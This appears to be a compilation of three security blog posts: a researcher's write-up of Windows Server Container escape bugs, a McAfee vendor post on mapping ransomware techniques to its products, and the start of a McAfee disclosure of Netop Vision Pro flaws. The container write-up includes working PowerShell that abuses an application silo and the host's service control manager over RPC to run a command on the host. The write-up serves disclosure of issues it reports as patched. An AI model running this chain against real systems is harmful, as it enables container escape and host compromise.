That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.

NextI used the NtObject drive provider to list the object manager namespace. For example checking the Device directory shows what device objects are available.

PS> ls NtObject:\Device

Name                                              TypeName

----                                              --------

Ip                                                SymbolicLink

Tcp6                                              SymbolicLink

Http                                              Directory

Ip6                                               SymbolicLink

ahcache                                           SymbolicLink

WMIDataDevice                                     SymbolicLink

LanmanDatagramReceiver                            SymbolicLink

Tcp                                               SymbolicLink

LanmanRedirector                                  SymbolicLink

DxgKrnl                                           SymbolicLink

ConDrv                                            SymbolicLink

Null                                              SymbolicLink

MailslotRedirector                                SymbolicLink

NamedPipe                                         Device

Udp6                                              SymbolicLink

VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink

KsecDD                                            SymbolicLink

DeviceApi                                         SymbolicLink

MountPointManager                                 Device

...

Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.

PS> ls HKLM:\SOFTWARE | Select-Object Name

Name

----

HKEY_LOCAL_MACHINE\SOFTWARE\Classes

HKEY_LOCAL_MACHINE\SOFTWARE\Clients

HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft

HKEY_LOCAL_MACHINE\SOFTWARE\ODBC

HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH

HKEY_LOCAL_MACHINE\SOFTWARE\Policies

HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications

HKEY_LOCAL_MACHINE\SOFTWARE\Setup

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node

PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name

Name

----

Classes

Clients

DefaultUserEnvironment

Docker Inc.

Intel

Macromedia

Microsoft

ODBC

OEM

OpenSSH

Partner

Policies

RegisteredApplications

Windows

WOW6432Node

The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> ls NtObject:\REGISTRY\USER | Select-Object Name

Name

----

.DEFAULT

S-1-5-19

S-1-5-20

S-1-5-21-426062036-3400565534-2975477557-1001

S-1-5-21-426062036-3400565534-2975477557-1001_Classes

S-1-5-21-426062036-3400565534-2975477557-1003

S-1-5-18

PS> Get-NtSid

Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2

No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container.

Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.

This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.

The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches.

The main enforcement mechanism used by the kernel to provide the container’s isolation is by calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state. Unfortunately you’d be wrong, the following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:

  1. We’re only checking for bad checks, not the lack of a check.
  2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
  3. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.

For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {

  if (PsIsCurrentThreadInServerSilo() 

    || !TargetHive

    || TargetHive == SourceHive) {

    return TRUE;

  }

  if (SourceHive->Flags.Trusted)

    return FALSE;

  // Check trust list.

}

Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.

POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) {

  if (Silo) {

    PPSP_STORAGE Storage = Silo->Storage;

    PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];

    if (Slot->Present)

      return Slot->Value;

  }

  return ObpRootDirectoryObject;

}

We can see that the function will extract a storage parameter from the passed-in silo, if present it will return the value of the slot. If the silo is NULL or the slot isn’t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory so this function should always return the silo root directory rather than the real global root directory.

This code seems perfectly fine, if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough, there are only two callers and they both have the following code.

PEJOB silo = PsGetCurrentSilo();

Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo);

Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo() {

  PETHREAD Thread = PsGetCurrentThread();

  PEJOB silo = Thread->Silo;

  if (silo == (PEJOB)-3) {

    silo = Thread->Tcb.Process->Job;

    while(silo) {

      if (silo->JobFlags & EJOB_SILO) {

        break;

      }

      silo = silo->ParentJob;

    }

  }

  return silo;

}

A silo can be associated with a thread, through impersonation or as can be one job in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches for any job in the job hierarchy for the process for anything which has the JOB_SILO flag set. If a silo is found, it’s returned from the function, otherwise NULL would be returned.

This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager to using the root directory all we need to do is:

  1. Create an application silo.
  2. Assign it to a process.
  3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you’re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.

The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $root = Get-NtDirectory "\"

PS> $root.FullPath

\

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> $root.FullPath

\Silos\748

To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.

We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.

Now we can check the root directory path again. We now find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the root root directory. At this point you can access resources on the host through the object manager.

Chaining the Exploits

We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM, you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) using the ALPC port to create a new service. You don’t even need to copy an executable outside the container as the system volume for the container is an accessible device on the host we can just access.

As far as the host’s SCM is concerned you’re an administrator and so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run in the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service you will end up accessing the container’s SCM, not the hosts.

To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $imp = $token.Impersonate()

PS> $sym_path = "$env:SystemDrive\symbols"

PS> mkdir $sym_path | Out-Null

PS> $services_path = "$env:SystemRoot\system32\services.exe"

PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'

# You can also use the following to run a container based executable.

#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {

#   "\\.\GLOBALROOT" + $f.FullPath

#}

PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path

PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path | 

   Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'

PS> $client = Get-RpcClient $rpc

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> Connect-RpcClient $client -EndpointPath ntsvcs

PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `

 [NullString]::Value, `

 [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)

PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `

 [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `

 [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)

PS> $client.RStartServiceW($service.p15, 0, $null)

For this code to work it’s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.

I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120 which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant.

The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run.

After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.

Conclusions

The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here.

Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.

McAfee Defenders Blog: Reality Check for your Defenses

31 March 2021 at 16:22
How to check for viruses

Welcome to reality

Ever since I started working in IT Security more than 10 years ago, I wondered, what helps defend against malware the best?

This simple question does not stand on its own, as there are several follow-up questions to that:

  1. How is malware defined? Are we focusing solely on Viruses and Trojans, or do we also include Adware and others?
  2. What malware types are currently spread across the globe? What died of old age and what is brand new?
  3. How does malware operate? Is file-less malware a short-lived trend or is it here to stay?
  4. What needs to be done to adequately defend against malware? What capabilities are needed?
  5. What defenses are already in place? Are they configured correctly?

This blog will guide you through my research and thought process around these questions and how you can enable yourself to answer these for your own organization!

A quick glance into the past

As mentioned above, the central question “what helps best?” has followed me throughout the years, but my methods to be able to answer this question have evolved. The first interaction I had with IT Security was more than 10 years ago, where I had to manually deploy new Anti-Virus software from a USB-key to around 100 devices. The settings were configured by a colleague in our IT-Team, and my job was to help remove infections when they came up, usually by going through the various folders or registry keys and cleaning up the remains. The most common malware was Adware, and the good-ol obnoxious hotbars which were added to the browser. I remember one colleague calling into IT saying “my internet has become so small, I can barely even read 5 lines of text” which we later translated into “I had 6 hotbars installed on my Internet Explorer so there was nearly no space left for the content to be displayed”.

Exemplary picture of the “internet” getting smaller.

Jump ahead a couple of years, I started working with McAfee ePolicy Orchestrator to manage and deploy Anti-Malware from a central place automatically, and not just for our own IT, but I was was allowed to implement McAfee ePO into our customers’ environments. This greatly expanded my view into what happens in the world of malware and I started using the central reporting tool to figure out where all these threats were coming from:

 

Also, I was able to understand how the different McAfee tools helped me in detecting and blocking these threats:

But this only showed the viewpoint of one customer and I had to manually overlay them to figure out what defense mechanism worked best. Additionally, I couldn’t see what was missed by the defense mechanisms, either due to configuration, missing signatures, or disabled modules. So, these reports gave me a good viewpoint into the customers I managed, but not the complete picture. I needed a different perspective, perhaps from other customers, other tools, or even other geo-locations.

Let us jump further ahead in my personal IT security timeline to about June 2020:

How a new McAfee solution changed my perception, all while becoming a constant pun

As you could see above, I spent quite a lot of time optimizing setups and configurations to assist customers in increasing their endpoint security. As time progressed, it became clear that solely using Endpoint Protection, especially only based on signatures, was not state of the art. Protection needs to be a combination of security controls rather than the obnoxious silver bullet that is well overplayed in cybersecurity. And still, the best product or solution set doesn’t help if you don’t know what you are looking for (Question 1&2), how to prepare (Question 4) or if you misconfigured the product including all subfolders of “C:\” as an exclusion for On-Access-Scanning (Question 5).

Then McAfee released MVISION Insights this summer and it clicked in my head:

  1. I can never use the word “insights” anymore as everyone would think I use it as a pun
  2. MVISION Insights presented me with verified data of current campaigns running around in the wild
  3. MVISION Insights also aligns the description of threats to the MITRE ATT&CK® Framework, making them comparable
  4. From the ATT&CK™ Framework I could also link from the threat to defensive capabilities

With this data available it was possible to create a heatmap not just by geo-location or a very high number of new threats every day, hour or even minute, but on how specific types of campaigns are operating out in the wild. To start assessing the data, I took 60 ransomware campaigns dating between January and June 2020 and pulled out all the MITRE ATT&CK© techniques that have been used and displayed them on a heatmap:

Amber/Orange: Being used the most, green: only used in 1 or 2 campaigns

Reality Check 1: Does this mapping look accurate?

For me it does, and here is why:

  1. Initial Access comes from either having already access to a system or by sending out spear phishing attachments
  2. Execution uses various techniques from CLI, to PowerShell and WMI
  3. Files and network shares are being discovered so the ransomware knows what to encrypt
  4. Command and control techniques need to be in place to communicate with the ransomware service provider
  5. Files are encrypted on impact, which is kind of a no-brainer, but on the other hand very sound-proof on what we feel what ransomware is doing, and it is underlined by the work of the threat researchers and the resulting data

Next, we need to understand what can be done to detect and ideally block ransomware in its tracks. For this I summarized key malware defense capabilities and mapped them to the tactics being used most:

MITRE Tactic Security Capability Example McAfee solution features
Execution Attack surface reduction ENS Access Protection and Exploit Prevention, MVISION Insights recommendations
Multi-layered detection ENS Exploit Prevention, MVISION Insights telemetry, MVISION EDR Tracing, ATD file analysis
Multi-layered protection ENS On-Access-Scanning using Signatures, GTI, Machine-Learning and more
Rule & Risk-based analytics MVISION EDR tracing
Containment ENS Dynamic Application Containment
Persistence Attack surface reduction ENS Access Protection or Exploit Prevention, MVISION Insights recommendations
Multi-layered detection ENS Exploit Prevention, MVISION Insights telemetry, MVISION EDR Tracing, ATD file analysis
Sandboxing and threat analysis ATD file analysis
Rule & Risk-based analytics MVISION EDR tracing
Containment ENS Dynamic Application Containment
Defense Evasion Attack surface reduction ENS Access Protection and Exploit Prevention, MVISION Insights recommendations
Multi-layered detection ENS Exploit Prevention, MVISION Insights telemetry, MVISION EDR Tracing, ATD file analysis
Sandboxing and threat analysis ATD file analysis
Rule & Risk-based analytics MVISION EDR tracing
Containment ENS Dynamic Application Containment
Discovery Attack surface reduction ENS Access Protection and Exploit Prevention
Multi-layered detection ENS Exploit Prevention, MVISION EDR Tracing, ATD file analysis
Sandboxing and threat analysis ATD file analysis
Rule & Risk-based analytics MVISION EDR tracing
Command & Control Attack surface reduction MVISION Insights recommendations
Multi-layered detection ENS Firewall IP Reputation, MVISION Insights telemetry, MVISION EDR Tracing, ATD file analysis
Multi-layered protection ENS Firewall
Rule & Risk-based analytics MVISION EDR tracing
Containment ENS Firewall and Dynamic Application Containment
Impact Multi-layered detection MVISION EDR tracing, ATD file analysis
Rule & Risk-based analytics MVISION EDR tracing
Containment ENS Dynamic Application Containment
Advanced remediation ENS Advanced Rollback

A description of the McAfee Solutions is provided below. 

Now this allowed me to map the solutions from the McAfee portfolio to each capability, and with that indirectly to the MITRE tactics. But I did not want to end here, as different tools might take a different role in the defensive architecture. For example, MVISION Insights can give you details around your current configuration and automatically overlays it with the current threat campaigns in the wild, giving you the ability to proactively prepare and harden your systems. Another example would be using McAfee Endpoint Security (ENS) to block all unsigned PowerShell scripts, effectively reducing the risk of being hit by a file-less malware based on this technology to nearly 0%. On the other end of the scale, solutions like MVISION EDR will give you great visibility of actions that have occurred, but this happens after the fact, so there is a high chance that you will have some cleaning up to do. This brings me to the topic of “improving protection before moving into detection” but this is for another blog post.

Coming back to the mapping shown above, let us quickly do…

Reality Check 2: Does this mapping feel accurate too?

For me it does, and here is why:

  1. Execution, persistence, and defense evasion are tactics where a lot of capabilities are present, because we have a lot of mature security controls to control what is being executed, in what context and especially defense evasion techniques are good to detect and protect against.
  2. Discovery has no real protection capability mapped to it, as tools might give you indicators that something suspicious is happening but blocking every potential file discovery activity will have a very huge operational impact. However, you can use sandboxing or other techniques to assess what the ransomware is doing and use the result from this analysis to stop ongoing malicious processes.
  3. Impact has a similar story, as you cannot block any process that encrypts a file, as there are many legitimate reasons to do so and hundreds of ways to accomplish this task. But again, you can monitor these actions well and with the right technology in place, even roll back the damage that has been done.

Now with all this data at hand we can come to the final step and bring it all together in one simple graph.

One graph to bind them…

Before we jump into our conclusion, here is a quick summary of the actions I have taken:

  1. Gather data from 60 ransomware campaigns
  2. Pull out the MITRE ATT&CK techniques being used
  3. Map the necessary security capabilities to these techniques
  4. Bucketize the capabilities depending on where they are in the threat defense lifecycle
  5. Map McAfee solutions to the capabilities and applying a weight to the score
  6. Calculate the score for each solution
  7. Create graph for the ransomware detection & protection score for our most common endpoint bundles and design the best fitting security architecture

So, without further ado and with a short drumroll I want to present to you the McAfee security architecture that best defends against current malware campaigns:

For reference, here is a quick breakdown of the components that make up the architecture above:

MVISION ePO is the SaaS-based version of our famous security management solution, which makes it possible to manage a heterogenous set of systems, policies, and events from a central place. Even though I have mentioned the SaaS-based version here, the same is true for our ePO on-premises software as well.

MVISION Insights is a key data source that helps organizations understand what campaigns and threats are trending. This is based on research from our Advanced Threat Research (ATR) team who use our telemetry data inside our Global Threat Intelligence (GTI) big-data platform to enhance the details that are provided.

MVISION Endpoint Detect & Response (EDR) is present in multiple boxes here, as it is a sensor on one side, which sits on the endpoint and collects data, and it is also a cloud service which receives, stores and analyses the data.

EPP is our Endpoint Protection Platform, which contains multiple items working in conjunction. First there is McAfee Endpoint Security (ENS) that is sitting on the device itself and has multiple detection and protection capabilities. For me, the McAfee Threat Intelligence Exchange (TIE) server is always a critical piece to McAfee’s Endpoint Protection Platform and has evolved from a standalone feature to an integrated building block inside ePO and is therefore not shown in the graphic above.

McAfee Advanced Threat Defense (ATD) extends the capabilities of both EPP and EDR, as it can run suspicious files in a separated environment and shares the information gathered with the other components of the McAfee architecture and even 3rd-party tools. It also goes the other way around as ATD allows other security controls to forward files for analysis in our sandbox, but this might be a topic for another blog post.

All the items listed above can be acquired by licensing our MVISION Premium suite in combination with McAfee ATD.

Based on the components and the mapping to the capabilities, I was also able to create a graph based on our most common device security bundles and their respective malware defense score:

In the graph above you can see four of our most sold bundles, ranging from the basic MVISION Standard, up to MVISION Premium in combination with McAfee Advanced Threat Defense (ATD). The line shows the ransomware detection & protection score, steadily rising as you go from left to right. Interestingly, the cost per point, i.e. how much dollar you need to spend to get one point, is much lower when buying the largest option in comparison to the smaller ones. As the absolute cost varies on too many variables, I have omitted an example here. Contact your local sales representative to gather an estimated calculation for your environment.

So, have I come to this conclusion by accident? Let us find out in the last installment of the reality check:

Reality Check 3:  Is this security architecture well suited for today’s threats?

For me it does, and here is why:

  1. It all starts with the technology on the endpoint. A good Endpoint Protection Platform can not only prevent attacks and harden the system, but it can also protect against threats when they are written on a disk or are executed, and then start malicious activities. But what is commonly overlooked: A good endpoint solution can also bring in a lot of visibility, making it the foundation of every good incident response practice.
  2. ATD plays a huge role in the overall architecture as you can see from the increase in points between MVISION Premium and MVISION Premium + ATD in the graph above. It allows the endpoint to have another opinion, which is not limited in time and resources to come to a conclusion, and it has no scan exceptions applied when checking a file. As this is integrated into the protection, it helps block threats before spreading and it certainly provides tremendous details around the malware that was discovered.
  3. MVISION Insights also plays a huge role in both preventative actions, so that you can harden your machines before you are hit, but also in detecting things that might have slipped through the cracks or where new indicators have emerged only after a certain time period.
  4. MVISION EDR has less impact on the scoring, as it is a pure detection technology. However, it also has a similar advantage as our McAfee ATD, as the client only forwards the data, and the heavy lifting is done somewhere else. It also goes back around, as EDR can pull in data from other tools shown above, like ENS, TIE or ATD just to name a few.
  5. MVISION ePO must be present in any McAfee architecture, as it is the heart and soul for every operational task. From managing policies, rollouts, client-tasks, reporting and much more, it plays a critical role and has for more than two decades now.

And the answer is not 42

While writing up my thoughts into the blog post, I was reminded of the “Hitchhikers Guide to the Galaxy”, as my journey in cybersecurity started out with the search for the answer to everything. But over the years it evolved into the multiple questions I prompted at the start of the article:

  1. How is malware defined? Are we focusing solely on Viruses and Trojans, or do we also include Adware and others?
  2. What malware types are currently spread across the globe? What died of old age and what is brand new?
  3. How does malware operate? Is file-less malware a short-lived trend or is it here to stay?
  4. What needs to be done to adequately defend against malware? What capabilities are needed?
  5. What defenses are already in place? Are they configured correctly?

And certainly, the answers to these questions are a moving target. Not only do the tools and techniques by the adversaries evolve, so do all the capabilities on the defensive side.

I welcome you to take the information provided by my research and apply it to your own security architecture:

  • Do you have the right capabilities to protect against the techniques used by current ransomware campaigns?
  • Is detection already a key part of your environment and how does it help to improve your protection?
  • Have you recently tested your defenses against a common threat campaign?
  • Are you sharing detections within your architecture from one security tool to the other?
  • What score would your environment reach?

Thank you for reading this blog post and following my train of thought. I would love to hear back from you, on how you assess yourself, what could be the next focus area for my research or if you want to apply the scoring mechanism on your environment! So please find me on LinkedIn or Twitter, write me a short message or just say “Hi!”.

I also must send out a big “THANK YOU!” to all my colleagues at McAfee helping out during my research: Mo Cashman, Christian Heinrichs, John Fokker, Arnab Roy, James Halls and all the others!

 

The post McAfee Defenders Blog: Reality Check for your Defenses appeared first on McAfee Blog.

Netop Vision Pro – Distance Learning Software is 20/20 in Hindsight

By: Sam Quinn
22 March 2021 at 04:01

The McAfee Labs Advanced Threat Research team is committed to uncovering security issues in both software and hardware to help developers provide safer products for businesses and consumers. We recently investigated software installed on computers used in K-12 school districts. The focus of this blog is on Netop Vision Pro produced by Netop. Our research into this software led to the discovery of four previously unreported critical issues, identified by CVE-2021-27192, CVE-2021-27193, CVE-2021-27194 and CVE-2021-27195. These findings allow for elevation of privileges and ultimately remote code execution, which could be used by a malicious attacker, within the same network, to gain full control over students’ computers. We reported this research to Netop on December 11, 2020 and we were thrilled that Netop was able to deliver an updated version in February of 2021, effectively patching many of the critical vulnerabilities.

Netop Vision Pro is a student monitoring system for teachers to facilitate student learning while using school computers. Netop Vision Pro allows teachers to perform tasks remotely on the students’ computers, such as locking their computers, blocking web access, remotely controlling their desktops, running applications, and sharing documents. Netop Vision Pro is mainly used to manage a classroom or a computer lab in a K-12 environment and is not primarily targeted for eLearning or personal devices. In other words, the Netop Vision Pro Software should never be accessible from the internet in the standard configuration. However, as a result of these abnormal times, computers are being loaned to students to continue distance learning, resulting in schooling software being connected to a wide array of networks increasing the attack surface.

Initial Recon

Netop provides all software as a free trial on its website, which makes it easy for anyone to download and analyze it. Within a few minutes of downloading the software, we were able to have it configured and running without any complications.

We began by setting up the Netop software in a normal configuration and environment. We placed four virtual machines on a local network; three were set up as students and one was set up as a teacher. The three student machines were configured with non-administrator accounts in our attempt to emulate a normal installation. The teacher first creates a “classroom” which then can choose which student PCs should connect. The teacher has full control and gets to choose which “classroom” the student connects to without the student’s input. Once a classroom has been setup, the teacher can start a class which kicks off the session by pinging each student to connect to the classroom. The students have no input if they want to connect or not as it is enforced by the teacher. Once the students have connected to the classroom the teacher can perform a handful of actions to the entire class or individual students.

During this setup we also took note of the permission levels of each component. The student installation needs to be tamperproof and persistent to prevent students from disabling the service. This is achieved by installing the Netop agent as a system service that is automatically started at boot. The teacher install executes as a normal user and does not start at boot. This difference in execution context and start up behavior led us to target the student installs, as an attacker would have a higher chance of gaining elevated system permissions if it was compromised. Additionally, the ratio of students to teachers in a normal school environment would ensure any vulnerabilities found on the student machines would be wider spread.

With the initial install complete, we took a network capture on the local network and took note of the traffic between the teacher and student. An overview of the first few network packets can been seen in Figure 1 below and how the teacher, student transaction begins.

Figure 1: Captured network traffic between teacher and student

Our first observation, now classified as CVE-2021-27194, was that all network traffic was unencrypted with no option to turn encryption on during configuration. We noticed that even information normally considered sensitive, such as Windows credentials (Figure 2) and screenshots (Figure 4), were all sent in plaintext. Windows credentials were observed on the network when a teacher would issue a “Log on” command to the student. This could be used by the teacher or admin to install software or simply help a student log in.

Figure 2: Windows credentials passed in plaintext

Additionally, we observed interesting default behavior where a student connecting to a classroom immediately began to send screen captures to the classroom’s teacher. This allows the teacher to monitor all the students in real time, as shown in Figure 3.

Figure 3: Teacher viewing all student machines via screenshots

